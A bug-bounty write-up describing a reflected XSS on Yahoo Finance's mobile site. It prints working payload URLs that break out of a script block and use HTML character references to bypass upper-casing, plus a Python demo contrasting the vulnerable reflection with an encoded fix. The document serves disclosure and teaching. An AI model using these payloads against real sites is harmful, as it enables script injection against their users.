Filter Bypass to Reflected XSS on https://finance.yahoo.com (mobile version)
Today I'll share an interesting XSS in Yahoo. Yahoo is my favorite target because they have a big scope, so let's start.
During the hunting process I noticed that some websites are responsive, with a separate mobile layout. Vulnerabilities found in the desktop version of a website are not always present in the mobile version, and the reverse is also true. I tried to find any bug on https://finance.yahoo.com but found nothing :(, so I decided to look for bugs in the mobile version of the site instead.
Until I found a very interesting endpoint:
https://finance.yahoo.com/quote/xxxxxxxxyyyyzzzzzz
At this endpoint, everything I wrote in the URL path was reflected in the page. Through this I could have done content spoofing, but I didn't, since it has no impact for Yahoo and is also out of scope, so my other option was to test for XSS, which I did with the following payload:
https://finance.yahoo.com/quote/"><svg onload=alert(1)>
Luckily, looking at the page source I saw that the characters `"><` were reflected without being processed, so an XSS should have been possible. At first I did not understand why the XSS did not fire, given that the attack vector was correct. Then I understood: the reflection landed inside a script block, so I had to close the `</script>` tag first for the payload to work. And then…
Not running :(
So I started to study the behavior of this reflection, and I realized that the payload was being converted to capital letters. A payload in capital letters does not work, because JavaScript identifiers are case-sensitive: `ALERT` is not `alert`. I only needed the word "alert" to reach the browser in lowercase. Then I came up with HTML character encoding, since the browser decodes numeric character references after the server has already applied its transformation.
Lowercase: `alert`
Encoded as decimal HTML character references (the same ones used, URL-encoded, in the payload below): `&#97;&#108;&#101;&#114;&#116;`
New XSS payload:
https://finance.yahoo.com/quote/"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
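As an added example (not the author's code, and not Yahoo's), the following Python models the two points above: the reflected value is upper-cased but never output-encoded, and numeric character references survive the upper-casing because the browser decodes them afterwards. The `<script>` template, the upper-casing filter and the test payload are assumptions constructed for the demonstration; the fix shown encodes the value for a JavaScript-string context instead of relying on a case transform.

```python
import html
import json

# Decimal character references for "alert", as used in the write-up's payload.
ENTITY_ENCODED_ALERT = "&#97;&#108;&#101;&#114;&#116;"

# Constructed test input, modelled on the write-up's payload (not the original URL).
PAYLOAD = '"></script><svg onload=' + ENTITY_ENCODED_ALERT + "(1)>"


def uppercase_filter(text: str) -> str:
    """The transform the author observed: the reflected value is upper-cased (assumed)."""
    return text.upper()


def as_seen_by_browser(text: str) -> str:
    """Decode character references the way the HTML parser does for attribute values.

    Digits, '&', '#' and ';' are unaffected by upper-casing, so the decoded
    result is still the lowercase identifier the server tried to neutralise.
    """
    return html.unescape(text)


def render_vulnerable(segment: str) -> str:
    """Reflect the path segment into a script block with the case filter only (assumed template)."""
    return '<script>var quote = "' + uppercase_filter(segment) + '";</script>'


def render_fixed(segment: str) -> str:
    """Reflect the same value encoded for a JavaScript-string context.

    json.dumps escapes quotes and backslashes; the extra replacements make sure
    '</script>' and '&' can never appear literally, so the value is inert data.
    """
    safe = (
        json.dumps(segment)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )
    return "<script>var quote = " + safe + ";</script>"


def breaks_out_of_script(rendered: str) -> bool:
    """True if the rendered page contains a closing script tag inside the reflected value."""
    return rendered.upper().count("</SCRIPT>") > 1
```

`render_vulnerable(PAYLOAD)` contains a second `</SCRIPT>` followed by `<SVG ONLOAD=&#97;...>`, which the browser reads as a lowercase `alert` call; `render_fixed(PAYLOAD)` keeps the value recoverable as a JSON string but never lets it leave the string context.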
:O :O :O and happiness came into my life :D.
Thanks
Twitter: @saamux